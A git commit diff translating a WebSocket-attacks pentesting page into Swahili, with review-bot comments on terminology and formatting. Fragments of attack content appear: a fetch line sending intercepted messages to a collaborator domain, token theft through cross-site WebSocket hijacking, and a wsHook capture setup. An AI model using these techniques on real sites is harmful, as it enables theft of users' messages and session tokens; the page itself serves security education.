Translated ['src/pentesting-web/websocket-attacks.md'] to sw

This commit is contained in:
Translator 2025-03-09 14:31:29 +00:00
parent d5c0408a51
commit f72a804760

@ -4,7 +4,7 @@
## What are WebSockets ## What are WebSockets
WebSocket connections zinaundwa kupitia mkutano wa awali wa **HTTP** na zimeundwa kuwa **za muda mrefu**, zikiruhusu ujumbe wa pande mbili wakati wowote bila haja ya mfumo wa kibiashara. Hii inafanya WebSockets kuwa na faida hasa kwa programu zinazohitaji **latency ya chini au mawasiliano yanayoanzishwa na seva**, kama vile mitiririko ya data za kifedha za moja kwa moja. WebSocket connections zinaundwa kupitia mkutano wa awali wa **HTTP** na zimeundwa kuwa **za muda mrefu**, zikiruhusu ujumbe wa pande mbili wakati wowote bila haja ya mfumo wa kibiashara. Hii inafanya WebSockets kuwa na faida hasa kwa programu zinazohitaji **muda mfupi wa kuchelewesha au mawasiliano yanayoanzishwa na seva**, kama vile mitiririko ya data za kifedha za moja kwa moja.
### Establishment of WebSocket Connections ### Establishment of WebSocket Connections
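Review bot: replacing "latency ya chini" with "muda mfupi wa kuchelewesha" in the first paragraph drops a technical term, while the rest of the page keeps such terms in English ("fingerprint", "vulnerabilities", "interception rules"). Consider keeping "latency", or glossing it once in parentheses. The same sentence renders the HTTP handshake as "mkutano wa awali wa **HTTP**", whereas the next hunk uses "mkono" for the handshake response; pick one term and use it throughout the file.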
@ -26,7 +26,7 @@ Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2 Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket Upgrade: websocket
``` ```
Majibu ya mkono wa server: Majibu ya mkono wa mkono wa seva:
```javascript ```javascript
HTTP/1.1 101 Switching Protocols HTTP/1.1 101 Switching Protocols
Connection: Upgrade Connection: Upgrade
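Review bot: the new label "Majibu ya mkono wa mkono wa seva:" repeats "mkono wa", which looks like a translation slip; it should read "Majibu ya mkono wa seva:" or use whichever handshake term is chosen for the rest of the page. The response block under it is fenced as javascript on both sides although it holds an HTTP response; this commit does not change the tag, so it is better corrected in the source file that the translations are generated from.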
@ -63,17 +63,22 @@ websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
``` ```
### Websockets enumeration ### Websockets enumeration
Unaweza kutumia **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **kugundua, fingerprint na kutafuta** **vulnerabilities** zinazojulikana katika websockets kiotomatiki. Unaweza kutumia **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **kuvumbua, fingerprint na kutafuta** **vulnerabilities** zinazojulikana katika websockets kiotomatiki.
### Websocket Debug tools ### Websocket Debug tools
- **Burp Suite** inasaidia mawasiliano ya MitM websockets kwa njia inayofanana sana na inavyofanya kwa mawasiliano ya kawaida ya HTTP. - **Burp Suite** inasaidia mawasiliano ya MitM websockets kwa njia inayofanana sana na inavyofanya kwa mawasiliano ya kawaida ya HTTP.
- [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite extension** itakuruhusu kudhibiti mawasiliano ya Websocket kwa njia bora zaidi katika Burp kwa kupata **history**, kuweka **interception rules**, kutumia **match and replace** rules, kutumia **Intruder** na **AutoRepeater.** - [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite extension** itakuruhusu kudhibiti mawasiliano ya Websocket kwa njia bora katika Burp kwa kupata **history**, kuweka **interception rules**, kutumia **match and replace** rules, kutumia **Intruder** na **AutoRepeater.**
- [**WSSiP**](https://github.com/nccgroup/wssip)**:** Fupi kwa "**WebSocket/Socket.io Proxy**", chombo hiki, kilichoandikwa kwa Node.js, kinatoa interface ya mtumiaji ili **kuchukua, kukamata, kutuma ujumbe wa kawaida** na kuona mawasiliano yote ya WebSocket na Socket.IO kati ya mteja na seva. - [**WSSiP**](https://github.com/nccgroup/wssip)**:** Fupi kwa "**WebSocket/Socket.io Proxy**", chombo hiki, kilichoandikwa kwa Node.js, kinatoa interface ya mtumiaji ili **kukamata, kuingilia, kutuma ujumbe wa kawaida** na kuona mawasiliano yote ya WebSocket na Socket.IO kati ya mteja na seva.
- [**wsrepl**](https://github.com/doyensec/wsrepl) ni **interactive websocket REPL** iliyoundwa mahsusi kwa ajili ya pentesting. Inatoa interface ya kuangalia **ujumbe wa websocket unaoingia na kutuma mpya**, kwa mfumo rahisi wa **kujiendesha** mawasiliano haya. - [**wsrepl**](https://github.com/doyensec/wsrepl) ni **interactive websocket REPL** iliyoundwa mahsusi kwa ajili ya penetration testing. Inatoa interface ya kuangalia **ujumbe wa websocket unaoingia na kutuma mpya**, kwa mfumo rahisi wa **kujiendesha** mawasiliano haya.
- [**https://websocketking.com/**](https://websocketking.com/) ni **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets**. - [**https://websocketking.com/**](https://websocketking.com/) ni **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets**.
- [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) kati ya aina nyingine za mawasiliano/protocols, inatoa **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets.** - [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) kati ya aina nyingine za mawasiliano/protocols, inatoa **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets.**
## Decrypting Websocket
- [https://github.com/Anof-cyber/PyCript](https://github.com/Anof-cyber/PyCript)
- [https://github.com/Anof-cyber/PyCript-WebSocket/](https://github.com/Anof-cyber/PyCript-WebSocket/)
## Websocket Lab ## Websocket Lab
Katika [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) una msimbo wa kuzindua tovuti kwa kutumia websockets na katika [**this post**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) unaweza kupata maelezo. Katika [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) una msimbo wa kuzindua tovuti kwa kutumia websockets na katika [**this post**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) unaweza kupata maelezo.
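Review bot: the added "## Decrypting Websocket" section (new side only) consists of two bare links, PyCript and PyCript-WebSocket, with no sentence saying what they are for, unlike every entry in the "Websocket Debug tools" list directly above it. Add a one-line description per link so the reader knows why they are listed. In the same hunk the wsrepl line changes "pentesting" to "penetration testing" while both remain English; keep a single form across the translated pages so later syncs do not flip it back.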
@ -105,7 +110,7 @@ fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
``` ```
### Cross Origin + Cookie with a different subdomain ### Cross Origin + Cookie with a different subdomain
Katika chapisho hili la blogu [https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/](https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/) mshambuliaji alifanikiwa **kutekeleza Javascript isiyo na mipaka katika subdomain** ya kikoa ambapo mawasiliano ya web socket yalikuwa yanafanyika. Kwa sababu ilikuwa **subdomain**, **cookie** ilikuwa inatumwa, na kwa sababu **Websocket haikukagua Origin ipasavyo**, ilikuwa inawezekana kuwasiliana nayo na **kuiba tokens kutoka kwake**. Katika chapisho hili la blogu [https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/](https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/) mshambuliaji alifanikiwa **kutekeleza Javascript isiyo na mipaka katika subdomain** ya kikoa ambapo mawasiliano ya web socket yalikuwa yanafanyika. Kwa sababu ilikuwa **subdomain**, **cookie** ilikuwa **inatumwa**, na kwa sababu **Websocket haikukagua Origin ipasavyo**, ilikuwa inawezekana kuwasiliana nayo na **kuiba tokens kutoka kwake**.
### Stealing data from user ### Stealing data from user
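Review bot: the only change in the Gitpod paragraph wraps "inatumwa" in bold, which leaves "**cookie** ilikuwa **inatumwa**" as two separate emphasis spans around one short clause. Confirm that this matches the emphasis in the file being translated; if it does not, revert it so a translation-only commit carries no formatting churn. The line also spells "Javascript", which could be normalised to "JavaScript" if the sentence is being touched anyway.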
@ -129,7 +134,7 @@ xhttp.send()
return messageEvent return messageEvent
} }
``` ```
Sasa pakua faili `wsHook.js` kutoka [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) na **uhifadhi ndani ya folda yenye faili za wavuti**.\ Sasa pakua faili la `wsHook.js` kutoka [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) na **uhifadhi ndani ya folda yenye faili za wavuti**.\
Kufichua programu ya wavuti na kumfanya mtumiaji aungane nayo utaweza kuiba ujumbe uliotumwa na kupokelewa kupitia websocket: Kufichua programu ya wavuti na kumfanya mtumiaji aungane nayo utaweza kuiba ujumbe uliotumwa na kupokelewa kupitia websocket:
```javascript ```javascript
sudo python3 -m http.server 80 sudo python3 -m http.server 80
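Review bot: the fence at the end of this hunk is tagged javascript but holds a shell command, "sudo python3 -m http.server 80". The tag is the same on both sides, so the fix belongs in the file being translated (bash rather than javascript), from where each translation will pick it up. The paragraph line above it also ends in ".\" as a hard line break; check that the renderer used for the sw pages handles that the same way as the original.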